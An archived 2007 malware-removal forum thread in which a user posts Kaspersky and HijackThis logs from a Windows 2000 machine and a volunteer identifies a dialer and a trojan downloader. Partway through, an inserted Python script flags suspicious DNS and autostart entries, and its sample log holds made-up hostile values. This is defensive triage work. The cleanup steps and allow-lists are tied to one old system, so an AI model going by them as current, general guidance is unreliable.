
Thread: I am here again

  1. #21
    Member
    Join Date
    Jun 2007
    Location
    Canada
    Posts
    89


    Hi, you are just going to love me LOL. Yes, I did just do a fresh install on a brand new HD and I should not be infected, but....

    Well, look for yourself (groan). Here are Kaspersky and HJT.
    The 3 O17 entries on HJT are really troublesome to me. Are they really Lop?

    -------------------------------------------------------------------------------
    KASPERSKY ONLINE SCANNER REPORT
    Tuesday, August 28, 2007 11:10:04 AM
    Operating System: Microsoft Windows 2000 Professional, Service Pack 4 (Build 2195)
    Kaspersky Online Scanner version: 5.0.93.0
    Kaspersky Anti-Virus database last update: 28/08/2007
    Kaspersky Anti-Virus database records: 394397
    -------------------------------------------------------------------------------

    Scan Settings:
    Scan using the following antivirus database: extended
    Scan Archives: true
    Scan Mail Bases: true

    Scan Target - My Computer:
    C:\
    D:\

    Scan Statistics:
    Total number of scanned objects: 13630
    Number of viruses found: 2
    Number of infected objects: 4
    Number of suspicious objects: 0
    Duration of the scan process: 00:08:29

    Infected Object Name / Virus Name / Last Action
    C:\Documents and Settings\All Users\Application Data\avg7\Log\emc.log Object is locked skipped
    C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log Object is locked skipped
    C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log.lck Object is locked skipped
    C:\Documents and Settings\Default User\Cookies\index.dat Object is locked skipped
    C:\Documents and Settings\Default User\Local Settings\History\History.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\7MVQFKE7\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped
    C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\USM7QP0Q\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped
    C:\Documents and Settings\Ogre_Family\Cookies\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\History\History.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\History\History.IE5\MSHist012007082820070829\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Temp\~DF720.tmp Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\NTUSER.DAT Object is locked skipped
    C:\Documents and Settings\Ogre_Family\ntuser.dat.LOG Object is locked skipped
    C:\Program Files\Common Files\delsim\del.exe Infected: not-a-virus:Dialer.Win32.Agent.b skipped
    C:\Program Files\Zone Labs\ZoneAlarm\MailFrontier\MailBuddy.log Object is locked skipped
    C:\WINNT\CSC\00000001 Object is locked skipped
    C:\WINNT\Debug\ipsecpa.log Object is locked skipped
    C:\WINNT\Debug\oakley.log Object is locked skipped
    C:\WINNT\Debug\PASSWD.LOG Object is locked skipped
    C:\WINNT\Internet Logs\fwdbglog.txt Object is locked skipped
    C:\WINNT\Internet Logs\fwpktlog.txt Object is locked skipped
    C:\WINNT\Internet Logs\IAMDB.RDB Object is locked skipped
    C:\WINNT\Internet Logs\imsDebug.log Object is locked skipped
    C:\WINNT\Internet Logs\OGRE-M4U5AONIU6.ldb Object is locked skipped
    C:\WINNT\Internet Logs\tvDebug.log Object is locked skipped
    C:\WINNT\SchedLgU.Txt Object is locked skipped
    C:\WINNT\SoftwareDistribution\EventCache\{A9DA51B4-7EFE-4A9D-A7DA-70D7345D5E92}.bin Object is locked skipped
    C:\WINNT\SoftwareDistribution\ReportingEvents.log Object is locked skipped
    C:\WINNT\system32\config\AppEvent.Evt Object is locked skipped
    C:\WINNT\system32\config\default Object is locked skipped
    C:\WINNT\system32\config\default.LOG Object is locked skipped
    C:\WINNT\system32\config\SAM Object is locked skipped
    C:\WINNT\system32\config\SAM.LOG Object is locked skipped
    C:\WINNT\system32\config\SecEvent.Evt Object is locked skipped
    C:\WINNT\system32\config\SECURITY Object is locked skipped
    C:\WINNT\system32\config\SECURITY.LOG Object is locked skipped
    C:\WINNT\system32\config\software Object is locked skipped
    C:\WINNT\system32\config\software.LOG Object is locked skipped
    C:\WINNT\system32\config\SysEvent.Evt Object is locked skipped
    C:\WINNT\system32\config\system Object is locked skipped
    C:\WINNT\system32\config\SYSTEM.ALT Object is locked skipped
    C:\WINNT\system32\o Infected: Trojan-Downloader.BAT.Ftp.ab skipped
    C:\WINNT\Temp\ZLT06a05.TMP Object is locked skipped
    C:\WINNT\WindowsUpdate.log Object is locked skipped

    Scan process completed.

    Logfile of HijackThis v1.99.1
    Scan saved at 11:10:47 AM, on 28/08/2007
    Platform: Windows 2000 SP4 (WinNT 5.00.2195)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

    Running processes:
    C:\WINNT\System32\smss.exe
    C:\WINNT\system32\winlogon.exe
    C:\WINNT\system32\services.exe
    C:\WINNT\system32\lsass.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\WINNT\system32\svchost.exe
    C:\WINNT\system32\spoolsv.exe
    C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    C:\WINNT\System32\svchost.exe
    C:\WINNT\system32\MSTask.exe
    C:\WINNT\system32\ZoneLabs\vsmon.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\WINNT\System32\WBEM\WinMgmt.exe
    C:\WINNT\system32\svchost.exe
    C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
    C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
    C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe
    C:\WINNT\explorer.exe
    C:\Documents and Settings\Ogre_Family\Desktop\TeaTimer.exe
    C:\Documents and Settings\Ogre_Family\Desktop\HijackThis.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ca/
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Shaw Internet
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
    O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
    O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
    O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
    O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://pcpitstop.com/pcpitstop/PCPitStop.CAB
    O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
    O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1188275347500
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188282330906
    O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www.ca.com/us/securityadvisor...fo/webscan.cab
    O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    O23 - Service: CA ISafe (CAISafe) - Computer Associates International, Inc. - C:\WINNT\System32\ZoneLabs\isafe.exe
    O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
    O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

  2. #22
    pskelley (In Memoriam - Always in our heart)
    Join Date
    Oct 2005
    Location
    Clearwater, Florida
    Posts
    20,247


    the 3 017 entries on HJT are really troublesome to me are they really lop?
    O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    All three are for http://www.robtex.com/dns/wp.shawcable.net.html

    I have no idea how you could get infected this fast? Maybe you should not go online?

    KASPERSKY ONLINE SCANNER REPORT
    Tuesday, August 28, 2007 11:10:04 AM
    Number of infected objects: 4

    Delete the complete contents of the folder in RED:
    C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\7MVQFKE7\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped
    C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\USM7QP0Q\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped

    This is a dialer, delete the folder in RED:
    C:\Program Files\Common Files\delsim\del.exe Infected: not-a-virus:Dialer.Win32.Agent.b skipped

    This is a trojan downloader, delete the folder in RED:
    C:\WINNT\system32\o Infected: Trojan-Downloader.BAT.Ftp.ab skipped

    If any of those give you problems, boot into Safe Mode and delete them there:
    http://spyware-free.us/tutorials/safemode/

    You may need to enable hidden files and folders to see them:
    http://www.xtra.co.nz/help/0,,4155-1916458,00.html

    This is how easy it is to get infected:
    http://www.theregister.com/2007/05/1...e_malware_map/
    http://redtape.msnbc.com/2007/05/the_next_net_th.html

    You need to read this information about how to stay safe online:
    Here is some great information from experts in this field that will help you stay clean and safe online.
    http://users.telenet.be/bluepatchy/m...revention.html
    http://forums.spybot.info/showthread.php?t=279
    http://russelltexas.com/malware/allclear.htm
    http://forum.malwareremoval.com/viewtopic.php?t=14
    http://www.bleepingcomputer.com/forums/topict2520.html
    http://cybercoyote.org/security/not-admin.shtml

    Thanks...pskelley
    Safer Networking Forums
    http://www.spybot.info/en/donate/index.html
    If you are reading this information...thank a teacher,
    If you are reading it in English...thank a soldier.
    MS-MVP Consumer Security 2007-08-09
    Proud Member ASAP
    UNITE Member 2006
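    The two things done by eye in the post above, checking that every O17 SearchList domain really belongs to the ISP and glancing at where each autostart binary lives, can be scripted. The following is an added example for this thread; it is not part of HijackThis or of the forum's own tooling. The allowed ISP suffix (shawcable.net, from the logs above), the list of expected install roots, and the sample log are assumptions for the example: the first five sample lines follow the real log, while the Domain, NameServer and Temp-folder entries are constructed to show what a bad line looks like (192.0.2.0/24 is a documentation address range).

```python
"""Triage the O17 (DNS), O4 (autostart) and O23 (service) lines of a
HijackThis log.  Added example for this thread, not part of HijackThis."""
import re

# Assumptions for this example: the poster's ISP domain, no static
# NameServer expected (the box uses DHCP), and the roots under which
# autostart binaries are expected to live on a Windows 2000 install.
ALLOWED_DNS_SUFFIXES = ("shawcable.net",)
ALLOWED_NAMESERVERS = set()
ALLOWED_BINARY_ROOTS = ("c:\\program files\\", "c:\\progra~1\\",
                        "c:\\winnt\\", "c:\\windows\\")

# Constructed sample log.  The first five lines follow the real log in the
# thread; the Domain, NameServer and Temp-folder entries are invented to
# show what a bad line looks like (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe
O4 - HKCU\..\Run: [updater] "C:\Documents and Settings\User\Local Settings\Temp\svc.exe" /s
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = shawcable.net.evil-example.test
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 192.0.2.53,192.0.2.54
"""

O17_RE = re.compile(r"^O17 - (?P<key>.+?): (?P<name>\w+) = (?P<value>.*)$")
O4_RE = re.compile(r"^O4 - (?P<hive>.+?): \[(?P<label>[^\]]*)\] (?P<cmd>.*)$")
O23_RE = re.compile(r"^O23 - Service: (?P<svc>.+?) - (?P<vendor>.+?) - (?P<path>.*)$")
# Shortest prefix that ends in an executable extension, quotes stripped.
EXE_RE = re.compile(r'^"?(?P<path>[^"]*?\.(?:exe|dll|ocx|bat|cmd|scr|pif))"?',
                    re.IGNORECASE)


def in_allowed_domain(domain: str) -> bool:
    """Exact match or a real subdomain; a bare endswith() would also accept
    'evilshawcable.net'."""
    d = domain.strip().lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in ALLOWED_DNS_SUFFIXES)


def binary_path(cmd: str) -> str:
    """Pull the executable path out of an O4/O23 command string."""
    m = EXE_RE.match(cmd.strip())
    return m.group("path") if m else cmd.strip()


def path_is_expected(path: str) -> bool:
    p = path.lower()
    if "\\" not in p:          # bare name such as mobsync.exe: not judged here
        return True
    return p.startswith(ALLOWED_BINARY_ROOTS)


def triage(log_text: str) -> list:
    """Return (section, label, value) tuples for lines worth a second look."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        m = O17_RE.match(line)
        if m:
            name, value = m.group("name"), m.group("value")
            if name in ("SearchList", "Domain"):
                for d in filter(None, (x.strip() for x in value.split(","))):
                    if not in_allowed_domain(d):
                        findings.append(("O17", name, d))
            elif name == "NameServer":
                for ns in filter(None, re.split(r"[ ,]+", value)):
                    if ns not in ALLOWED_NAMESERVERS:
                        findings.append(("O17", name, ns))
            continue
        m = O4_RE.match(line)
        if m:
            path = binary_path(m.group("cmd"))
            if not path_is_expected(path):
                findings.append(("O4", m.group("label"), path))
            continue
        m = O23_RE.match(line)
        if m:
            path = binary_path(m.group("path"))
            if not path_is_expected(path):
                findings.append(("O23", m.group("svc"), path))
    return findings


if __name__ == "__main__":
    for section, label, value in triage(SAMPLE_LOG):
        print(f"{section:4} {label!r}: {value}")
```

    The domain test is the part worth copying: comparing against the suffix with a leading dot (or an exact match) is what keeps `shawcable.net.evil-example.test` and `evilshawcable.net` from passing, which a plain suffix match would allow. A static NameServer or Domain value under Tcpip\Parameters on a DHCP-configured home machine is something to question even when the value looks plausible, which is why the example flags every NameServer not on an explicit allow-list.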

  3. #23
    Member
    Join Date
    Jun 2007
    Location
    Canada
    Posts
    89


    I have no idea how you could get infected this fast? Maybe you should not go online?

    What is this supposed to mean? It sounds to me as if you are being rude about this! I don't understand how this is any of my fault. I had a copy of spybotsd14 on disk and ZoneAlarm that was installed before even installing the internet provider's software. We (my wife and I) also first updated Spybot and ZoneAlarm using their updaters before accessing the internet, and then we updated Windows as fast as possible. We were infected via Shaw from what I can tell, and they are the internet, cable and telephone provider that we use here. First of all, I don't understand if this is a real Lop infection, and I wish to know how to fix it. What more can I possibly use to keep from getting infected? We have always used and continue to use all tools recommended to us from the forums. Also, I have not visited any sites except Microsoft, Safer-Networking, Javacool, ZoneAlarm, Grisoft and our ISP start page directly (we manually typed in the addresses, then plugged in the ethernet cable, unplugging between downloads). We did not at any time use a search engine before all the above were updated and installed, nor did we "surf the web".

    Please Advise and help with this problem
    mightyuselessone

    -------------------------------------------------------------------------------
    KASPERSKY ONLINE SCANNER REPORT
    Tuesday, August 28, 2007 2:05:21 PM
    Operating System: Microsoft Windows 2000 Professional, Service Pack 4 (Build 2195)
    Kaspersky Online Scanner version: 5.0.93.0
    Kaspersky Anti-Virus database last update: 28/08/2007
    Kaspersky Anti-Virus database records: 395278
    -------------------------------------------------------------------------------

    Scan Settings:
    Scan using the following antivirus database: extended
    Scan Archives: true
    Scan Mail Bases: true

    Scan Target - My Computer:
    C:\
    D:\

    Scan Statistics:
    Total number of scanned objects: 12892
    Number of viruses found: 0
    Number of infected objects: 0
    Number of suspicious objects: 0
    Duration of the scan process: 00:08:25

    Infected Object Name / Virus Name / Last Action
    C:\Documents and Settings\All Users\Application Data\avg7\Log\emc.log Object is locked skipped
    C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log Object is locked skipped
    C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log.lck Object is locked skipped
    C:\Documents and Settings\Default User\Cookies\index.dat Object is locked skipped
    C:\Documents and Settings\Default User\Local Settings\History\History.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Cookies\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\History\History.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Temp\~DF720.tmp Object is locked skipped
    C:\Documents and Settings\Ogre_Family\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
    C:\Documents and Settings\Ogre_Family\NTUSER.DAT Object is locked skipped
    C:\Documents and Settings\Ogre_Family\ntuser.dat.LOG Object is locked skipped
    C:\Program Files\Zone Labs\ZoneAlarm\MailFrontier\MailBuddy.log Object is locked skipped
    C:\WINNT\CSC\00000001 Object is locked skipped
    C:\WINNT\Debug\ipsecpa.log Object is locked skipped
    C:\WINNT\Debug\oakley.log Object is locked skipped
    C:\WINNT\Debug\PASSWD.LOG Object is locked skipped
    C:\WINNT\Internet Logs\fwdbglog.txt Object is locked skipped
    C:\WINNT\Internet Logs\fwpktlog.txt Object is locked skipped
    C:\WINNT\Internet Logs\IAMDB.RDB Object is locked skipped
    C:\WINNT\Internet Logs\imsDebug.log Object is locked skipped
    C:\WINNT\Internet Logs\OGRE-M4U5AONIU6.ldb Object is locked skipped
    C:\WINNT\Internet Logs\tvDebug.log Object is locked skipped
    C:\WINNT\SchedLgU.Txt Object is locked skipped
    C:\WINNT\SoftwareDistribution\EventCache\{A9DA51B4-7EFE-4A9D-A7DA-70D7345D5E92}.bin Object is locked skipped
    C:\WINNT\SoftwareDistribution\ReportingEvents.log Object is locked skipped
    C:\WINNT\system32\config\AppEvent.Evt Object is locked skipped
    C:\WINNT\system32\config\default Object is locked skipped
    C:\WINNT\system32\config\default.LOG Object is locked skipped
    C:\WINNT\system32\config\SAM Object is locked skipped
    C:\WINNT\system32\config\SAM.LOG Object is locked skipped
    C:\WINNT\system32\config\SecEvent.Evt Object is locked skipped
    C:\WINNT\system32\config\SECURITY Object is locked skipped
    C:\WINNT\system32\config\SECURITY.LOG Object is locked skipped
    C:\WINNT\system32\config\software Object is locked skipped
    C:\WINNT\system32\config\software.LOG Object is locked skipped
    C:\WINNT\system32\config\SysEvent.Evt Object is locked skipped
    C:\WINNT\system32\config\system Object is locked skipped
    C:\WINNT\system32\config\SYSTEM.ALT Object is locked skipped
    C:\WINNT\Temp\ZLT06a05.TMP Object is locked skipped
    C:\WINNT\WindowsUpdate.log Object is locked skipped

    Scan process completed.

    Logfile of HijackThis v1.99.1
    Scan saved at 2:07:01 PM, on 28/08/2007
    Platform: Windows 2000 SP4 (WinNT 5.00.2195)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

    Running processes:
    C:\WINNT\System32\smss.exe
    C:\WINNT\system32\winlogon.exe
    C:\WINNT\system32\services.exe
    C:\WINNT\system32\lsass.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\WINNT\system32\svchost.exe
    C:\WINNT\system32\spoolsv.exe
    C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    C:\WINNT\System32\svchost.exe
    C:\WINNT\system32\MSTask.exe
    C:\WINNT\system32\ZoneLabs\vsmon.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\WINNT\System32\WBEM\WinMgmt.exe
    C:\WINNT\system32\svchost.exe
    C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
    C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
    C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe
    C:\WINNT\explorer.exe
    C:\Documents and Settings\Ogre_Family\Desktop\TeaTimer.exe
    C:\Documents and Settings\Ogre_Family\Desktop\HijackThis.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ca/
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Shaw Internet
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
    O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
    O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
    O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
    O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://pcpitstop.com/pcpitstop/PCPitStop.CAB
    O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
    O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1188275347500
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188282330906
    O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www.ca.com/us/securityadvisor...fo/webscan.cab
    O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    O23 - Service: CA ISafe (CAISafe) - Computer Associates International, Inc. - C:\WINNT\System32\ZoneLabs\isafe.exe
    O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
    O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

  4. #24
    pskelley (In Memoriam - Always in our heart)
    Join Date
    Oct 2005
    Location
    Clearwater, Florida
    Posts
    20,247


    Those 017 items are valid, if you have additional questions about those, I suggest you contact your Internet Service Provider.
    Your HJT log is clean as is your Kaspersky. This is about all I can do for you except to wish you safe surfing.

    Thanks

  5. #25
    Member
    Join Date
    Jun 2007
    Location
    Canada
    Posts
    89


    Sorry if I seem a little annoying to deal with; I am not going out trying to get infected purposely, and I really do appreciate the help that I receive. I have managed to get my system somewhat secured now, my wife doing most of it. I need help getting rid of 2 things: in Spybot I keep coming up with 9 redirects (windows sec etc.) and a virus by F-Secure's definition. Please help; I am trying to get this system to a point where I can use it and not be infected. As you will see, the O17's that were on the HJT log are no longer there, and Shaw has all but admitted that it was someone on the local internet that was the root of it when I gave them the ISP addresses that ZoneAlarm was showing. Here are F-Secure, HJT and VirusTotal logs. I hope that this is not that serious and you are willing to help.
    ty
    mightyuselessone

    Logfile of Trend Micro HijackThis v2.0.0 (BETA)
    Scan saved at 11:57:15 AM, on 30/08/2007
    Platform: Windows 2000 SP4 (WinNT 5.00.2195)
    Boot mode: Normal

    Running processes:
    C:\WINNT\System32\smss.exe
    C:\WINNT\system32\winlogon.exe
    C:\WINNT\system32\services.exe
    C:\WINNT\system32\lsass.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\WINNT\system32\svchost.exe
    C:\WINNT\system32\ZoneLabs\vsmon.exe
    C:\WINNT\system32\spoolsv.exe
    C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
    C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
    C:\WINNT\System32\svchost.exe
    C:\WINNT\cnmtmgr.exe
    C:\WINNT\system32\MSTask.exe
    C:\WINNT\System32\WBEM\WinMgmt.exe
    C:\WINNT\system32\svchost.exe
    C:\WINNT\system32\Ati2evxx.exe
    C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
    C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
    C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
    C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    C:\WINNT\System32\svchost.exe
    C:\WINNT\explorer.exe
    C:\Documents and Settings\Administrator\Desktop\HiJackThis_v2.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer Provided by SHAW Internet
    O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
    O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
    O4 - HKLM\..\Run: [shawnotify] c:\progra~1\shaw\update\updateloader.exe /notify
    O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
    O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe"
    O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
    O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
    O16 - DPF: {0B79F48A-E8D6-11DB-9283-E25056D89593} (F-Secure Online Scanner 3.1) - http://support.f-secure.com/ols/fscax.cab
    O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
    O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
    O16 - DPF: {49E71DB9-E803-43BA-AF81-1CAF61A6C4CB} (F-Secure Online Scanner 3.2) - http://support.f-secure.com/ols/beta/fscax.cab
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188412521140
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
